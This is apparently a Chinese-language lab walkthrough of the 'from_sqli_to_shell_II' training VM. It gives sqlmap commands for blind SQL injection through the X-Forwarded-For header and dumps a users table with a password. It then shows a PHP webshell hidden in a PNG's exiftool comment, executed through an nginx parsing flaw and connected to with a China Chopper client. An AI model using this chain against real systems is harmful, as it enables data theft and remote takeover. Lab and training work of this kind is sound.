第一步搭建靶机from_sqli_to_shell_II_i386网上搜索.PDF

第⼀步、搭建靶机from_sqli_to_shell_II_i386 ⽹上搜索from_sqli_to_shell_II_i386.iso ，直接在vm 中载⼊镜像即可 ifconfig查询ip地址:28 第⼆步、寻找注⼊点 输⼊⽹址:28 界⾯： 点开⼏个⻚⾯，发现都有⽤信息都没，点击Admin ，发现是后台: 发现有管理员登录界⾯,随便输⼊账号密码登录，发现不会报错也不会显示任何信息。推断可能是盲 注，⾃⼰乱试了很多发现都不⾏。 第三步、请求头修改测试 因为靶场题⽬是SQL注⼊，所以肯定与SQL注⼊有关，于是分别测试User-Agent，host,X-Forwarded- For,X-Powered-By等头。最后发现存在X-Forwarded-For注⼊。 利⽤SQLMAP注⼊命令 1 sqlmap -u 28/ --headers=X-Forwarded-For: localhost,* 结果如下： Payload: 1 AND SLEEP(5) AND Bido=Bido 第四步：获取数据库信息 获取数据名 sqlmap -u 28/ --headers=X-Forwarded-For: localhost,* -- dbs 只存在两个数据库，所以肯定是photoblog数据库，获取表名： 1 sqlmap -u 28/ --headers=X-Forwarded-For: localhost,* -D photoblog --tables 由于要登录，所以可能是users表，获取表信息： 1 sqlmap -u 28/ --headers=X-Forwarded-For: localhost,* --dbs -D photoblog -T users --dump P4ssw0rd 很明显显示账号密码，登录进去 第五步上传⽂件 登陆后，发现有new picture点击进去可以上传⽂件。 随便上传⼀个php⽂件进去显示 看来进⾏了过滤，只能上传gif,png,jpg⽂件，⽽且不是利⽤js检查⽂件类型⽽是后端检查。 抓包修改content-type为image/jpeg类型 结果还是不⾏。可能是基于后缀的检测。 扫描服务器类型 发现是nginx 0.7.67，⽹上搜索nginx上传⽂件漏洞，出现nginx的解析漏洞. 将php脚本后缀名改为png再上传 仍然是刚才的情况。 尝试上传⼀张正确的照⽚123.png 正确上传,看来基于图⽚内容也做了过滤。⽹上寻找⽅法，发现可以把图⽚和代码合为⼀个图⽚。利⽤ exiftool⼯具 第六步 mac下安装exiftool brew install exiftool安装 再⽤下⾯指令将yijuhua⽊⻢注⼊到1.png中 1 exiftool -comment=yijuhua.php 1.png ⽣成两张图⽚⼀张原始的，⼀张新的，利⽤新的图⽚123.png 利⽤UltraEdit打开1.png发现成功注⼊。 接着上传图⽚ 上传成功。 但是不知道被上传到哪⾥去了。点击照⽚ 跳转到照⽚界⾯。点击查看源代码，出现 看来⽂件被保存到admin/uploads⽂件夹下⾯了，且名字被改为152727208.png。 利⽤菜⼑连接:28/admin/uploads/1527427208.png/yijuhua.php且密码为cmd 最后显示连接成功，证明上传成功。